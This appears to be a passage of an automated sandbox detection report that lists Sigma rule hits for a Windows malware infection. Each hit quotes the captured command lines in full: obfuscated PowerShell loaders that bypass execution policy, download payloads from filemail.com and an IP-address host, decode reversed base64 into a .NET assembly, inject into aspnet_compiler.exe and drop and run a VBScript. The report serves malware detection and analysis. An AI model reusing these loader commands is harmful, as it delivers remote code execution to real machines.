Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5592, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS" , ProcessId: 6964, ProcessName: wscript.exe

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))", CommandLine: "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0c

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe, CommandLine|base64offset|contains: L, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5592, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe, ProcessId: 6036, ProcessName: powershell.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5592, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS" , ProcessId: 6964, ProcessName: wscript.exe

Sigma detected: AspNetCompiler Execution

Source: Process started

Author: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5568, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 3636, ProcessName: aspnet_compiler.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2x